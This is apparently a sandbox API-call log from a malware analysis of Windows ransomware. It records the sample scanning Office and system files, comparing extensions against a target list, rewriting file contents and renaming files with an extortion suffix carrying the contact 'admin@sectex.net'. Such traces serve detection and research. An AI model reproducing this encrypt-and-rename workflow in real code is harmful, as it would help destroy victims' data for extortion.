	[0171.057] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrorfromgroove.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\gfserrorfromgroove.ico")) returned 0x20
	[0171.057] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrorfromgroove.ico.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\gfserrorfromgroove.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrorfromgroove.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\gfserrorfromgroove.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0171.058] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.058] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.058] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrorfromgroove.ico.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\gfserrorfromgroove.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0171.058] GetLastError () returned 0x0
	[0171.058] ReadFile (in: hFile=0x17c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x6b6, lpOverlapped=0x0) returned 1
	[0171.275] WriteFile (in: hFile=0x3f0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x6c0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x6c0, lpOverlapped=0x0) returned 1
	[0171.281] ReadFile (in: hFile=0x17c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.281] WriteFile (in: hFile=0x3f0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x100, lpOverlapped=0x0) returned 1
	[0171.281] SetEndOfFile (hFile=0x3f0) returned 1
	[0171.704] CloseHandle (hObject=0x3f0) returned 1
	[0171.705] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.705] SetEndOfFile (hFile=0x17c) returned 1
	[0171.707] CloseHandle (hObject=0x17c) returned 1
	[0171.707] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrorfromgroove.ico.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) 

Thread:
	id = 61
	os_tid = 0x780

	[0137.448] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10000) returned 0xa0200b0
	[0137.449] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10000) returned 0xa0300b8
	[0137.449] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7baeae8
	[0137.449] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x6) returned 0x7bac858
	[0137.449] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7baeb00
	[0137.449] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x100000) returned 0xb3a0020
	[0137.449] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7baeb18
	[0137.449] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7baeb18, Size=0x20) returned 0x7b65ab8
	[0137.449] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7baeb18
	[0137.449] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7baeb18, Size=0x20) returned 0x7b65b58
	[0137.450] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77080000
	[0137.450] GetProcAddress (hModule=0x77080000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x770ad650
	[0137.450] Wow64DisableWow64FsRedirection (in: OldValue=0xaacff58 | out: OldValue=0xaacff58*=0x0) returned 1
	[0137.450] lstrlenW (lpString="kernel32.dll") returned 12
	[0137.450] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b65ab8 | out: hHeap=0x7ab0000) returned 1
	[0137.450] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0137.450] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b65b58 | out: hHeap=0x7ab0000) returned 1
	[0137.450] Sleep (dwMilliseconds=0x64) 
	[0137.598] Sleep (dwMilliseconds=0x64) 
	[0137.823] lstrcmpiW (lpString1=".ttf", lpString2=".bot") returned 1
	[0137.823] lstrlenW (lpString="jpn_boot.ttf") returned 12
	[0137.824] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320
	[0138.046] GetFileSizeEx (in: hFile=0x320, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=1984228) returned 1
	[0138.046] CloseHandle (hObject=0x320) returned 1
	[0138.046] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf")) returned 0x20
	[0138.046] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.046] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0138.046] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26
	[0138.046] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26
	[0138.046] lstrlenW (lpString=".doc") returned 4
	[0138.046] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1
	[0138.046] lstrlenW (lpString=".docx") returned 5
	[0138.046] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1
	[0138.046] lstrlenW (lpString=".pdf") returned 4
	[0138.046] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1
	[0138.046] lstrlenW (lpString=".xls") returned 4
	[0138.046] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1
	[0138.046] lstrlenW (lpString=".xlsx") returned 5
	[0138.046] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1
	[0138.046] lstrlenW (lpString=".ppt") returned 4
	[0138.046] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1
	[0138.047] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26
	[0138.047] lstrlenW (lpString=".zip") returned 4
	[0138.047] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1
	[0138.047] lstrlenW (lpString=".rar") returned 4
	[0138.047] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1
	[0138.047] lstrlenW (lpString=".bz2") returned 4
	[0138.047] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1
	[0138.047] lstrlenW (lpString=".7z") returned 3
	[0138.047] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1
	[0138.047] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26
	[0138.047] lstrlenW (lpString=".dbf") returned 4
	[0138.047] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1
	[0138.047] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26
	[0138.047] lstrlenW (lpString=".1cd") returned 4
	[0138.047] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1
	[0138.047] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26
	[0138.047] lstrlenW (lpString=".jpg") returned 4
	[0138.047] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1
	[0138.047] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26
	[0138.047] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26
	[0138.047] lstrlenW (lpString=".doc") returned 4
	[0138.047] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1
	[0138.047] lstrlenW (lpString=".docx") returned 5
	[0138.047] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1
	[0138.047] lstrlenW (lpString=".pdf") returned 4
	[0138.047] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1
	[0138.047] lstrlenW (lpString=".xls") returned 4
	[0138.047] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1
	[0138.047] lstrlenW (lpString=".xlsx") returned 5
	[0138.047] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1
	[0138.047] lstrlenW (lpString=".ppt") returned 4
	[0138.047] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1
	[0138.047] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26
	[0138.047] lstrlenW (lpString=".zip") returned 4
	[0138.048] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1
	[0138.048] lstrlenW (lpString=".rar") returned 4
	[0138.048] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1
	[0138.048] lstrlenW (lpString=".bz2") returned 4
	[0138.048] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1
	[0138.048] lstrlenW (lpString=".7z") returned 3
	[0138.048] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1
	[0138.048] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26
	[0138.048] lstrlenW (lpString=".dbf") returned 4
	[0138.048] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1
	[0138.048] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26
	[0138.048] lstrlenW (lpString=".1cd") returned 4
	[0138.048] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1
	[0138.048] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26
	[0138.048] lstrlenW (lpString=".jpg") returned 4
	[0138.048] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1
	[0138.048] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0138.048] lstrlenW (lpString="InputPersonalization.exe.mui") returned 28
	[0138.048] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0138.762] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=2560) returned 1
	[0138.762] CloseHandle (hObject=0x38c) returned 1
	[0138.762] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui")) returned 0x20
	[0138.762] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.763] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0138.763] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85
	[0138.763] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85
	[0138.763] lstrlenW (lpString=".doc") returned 4
	[0138.763] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0138.763] lstrlenW (lpString=".docx") returned 5
	[0138.763] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0138.763] lstrlenW (lpString=".pdf") returned 4
	[0138.763] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0138.763] lstrlenW (lpString=".xls") returned 4
	[0138.763] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0138.763] lstrlenW (lpString=".xlsx") returned 5
	[0138.763] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0138.763] lstrlenW (lpString=".ppt") returned 4
	[0138.763] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0138.763] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85
	[0138.763] lstrlenW (lpString=".zip") returned 4
	[0138.763] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0138.763] lstrlenW (lpString=".rar") returned 4
	[0138.763] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0138.763] lstrlenW (lpString=".bz2") returned 4
	[0138.763] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0138.763] lstrlenW (lpString=".7z") returned 3
	[0138.763] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0138.763] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85
	[0138.763] lstrlenW (lpString=".dbf") returned 4
	[0138.763] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0138.763] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85
	[0138.763] lstrlenW (lpString=".1cd") returned 4
	[0138.763] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0138.763] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85
	[0138.764] lstrlenW (lpString=".jpg") returned 4
	[0138.764] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0138.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85
	[0138.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85
	[0138.764] lstrlenW (lpString=".doc") returned 4
	[0138.764] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0138.764] lstrlenW (lpString=".docx") returned 5
	[0138.764] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0138.764] lstrlenW (lpString=".pdf") returned 4
	[0138.764] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0138.764] lstrlenW (lpString=".xls") returned 4
	[0138.764] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0138.764] lstrlenW (lpString=".xlsx") returned 5
	[0138.764] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0138.764] lstrlenW (lpString=".ppt") returned 4
	[0138.764] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0138.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85
	[0138.764] lstrlenW (lpString=".zip") returned 4
	[0138.764] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0138.764] lstrlenW (lpString=".rar") returned 4
	[0138.764] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0138.764] lstrlenW (lpString=".bz2") returned 4
	[0138.764] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0138.764] lstrlenW (lpString=".7z") returned 3
	[0138.764] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0138.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85
	[0138.764] lstrlenW (lpString=".dbf") returned 4
	[0138.764] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0138.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85
	[0138.764] lstrlenW (lpString=".1cd") returned 4
	[0138.764] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0138.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85
	[0138.764] lstrlenW (lpString=".jpg") returned 4
	[0138.764] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0138.765] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0138.765] lstrlenW (lpString="BRANDING.DLL") returned 12
	[0138.765] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0139.174] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=15224) returned 1
	[0139.174] CloseHandle (hObject=0x384) returned 1
	[0139.174] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.dll")) returned 0x20
	[0139.174] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0139.174] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0139.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL") returned 105
	[0139.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL") returned 105
	[0139.174] lstrlenW (lpString=".doc") returned 4
	[0139.174] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0139.174] lstrlenW (lpString=".docx") returned 5
	[0139.174] lstrcmpiW (lpString1=".docx", lpString2="G.DLL") returned -1
	[0139.174] lstrlenW (lpString=".pdf") returned 4
	[0139.174] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0139.175] lstrlenW (lpString=".xls") returned 4
	[0139.175] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0139.175] lstrlenW (lpString=".xlsx") returned 5
	[0139.175] lstrcmpiW (lpString1=".xlsx", lpString2="G.DLL") returned -1
	[0139.175] lstrlenW (lpString=".ppt") returned 4
	[0139.175] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0139.175] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL") returned 105
	[0139.175] lstrlenW (lpString=".zip") returned 4
	[0139.175] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0139.175] lstrlenW (lpString=".rar") returned 4
	[0139.175] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0139.175] lstrlenW (lpString=".bz2") returned 4
	[0139.175] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0139.175] lstrlenW (lpString=".7z") returned 3
	[0139.175] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0139.175] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL") returned 105
	[0139.175] lstrlenW (lpString=".dbf") returned 4
	[0139.175] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0139.175] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL") returned 105
	[0139.175] lstrlenW (lpString=".1cd") returned 4
	[0139.175] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0139.175] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL") returned 105
	[0139.175] lstrlenW (lpString=".jpg") returned 4
	[0139.175] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0139.175] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL") returned 105
	[0139.175] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL") returned 105
	[0139.175] lstrlenW (lpString=".doc") returned 4
	[0139.175] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0139.176] lstrlenW (lpString=".docx") returned 5
	[0139.176] lstrcmpiW (lpString1=".docx", lpString2="G.DLL") returned -1
	[0139.176] lstrlenW (lpString=".pdf") returned 4
	[0139.176] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0139.176] lstrlenW (lpString=".xls") returned 4
	[0139.176] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0139.176] lstrlenW (lpString=".xlsx") returned 5
	[0139.176] lstrcmpiW (lpString1=".xlsx", lpString2="G.DLL") returned -1
	[0139.176] lstrlenW (lpString=".ppt") returned 4
	[0139.176] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0139.176] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL") returned 105
	[0139.176] lstrlenW (lpString=".zip") returned 4
	[0139.176] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0139.176] lstrlenW (lpString=".rar") returned 4
	[0139.176] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0139.176] lstrlenW (lpString=".bz2") returned 4
	[0139.176] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0139.176] lstrlenW (lpString=".7z") returned 3
	[0139.176] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0139.176] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL") returned 105
	[0139.176] lstrlenW (lpString=".dbf") returned 4
	[0139.176] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0139.176] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL") returned 105
	[0139.176] lstrlenW (lpString=".1cd") returned 4
	[0139.176] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0139.176] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL") returned 105
	[0139.176] lstrlenW (lpString=".jpg") returned 4
	[0139.176] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0139.176] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0139.177] lstrlenW (lpString="OFFREL.DLL") returned 10
	[0139.177] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\offrel.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0139.249] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=9568) returned 1
	[0139.249] CloseHandle (hObject=0x384) returned 1
	[0139.249] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\offrel.dll")) returned 0x20
	[0139.249] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\offrel.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0139.249] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\offrel.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0139.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL") returned 66
	[0139.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL") returned 66
	[0139.249] lstrlenW (lpString=".doc") returned 4
	[0139.249] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0139.249] lstrlenW (lpString=".docx") returned 5
	[0139.249] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0139.249] lstrlenW (lpString=".pdf") returned 4
	[0139.249] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0139.249] lstrlenW (lpString=".xls") returned 4
	[0139.249] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0139.249] lstrlenW (lpString=".xlsx") returned 5
	[0139.249] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0139.249] lstrlenW (lpString=".ppt") returned 4
	[0139.249] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0139.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL") returned 66
	[0139.250] lstrlenW (lpString=".zip") returned 4
	[0139.250] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0139.250] lstrlenW (lpString=".rar") returned 4
	[0139.250] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0139.250] lstrlenW (lpString=".bz2") returned 4
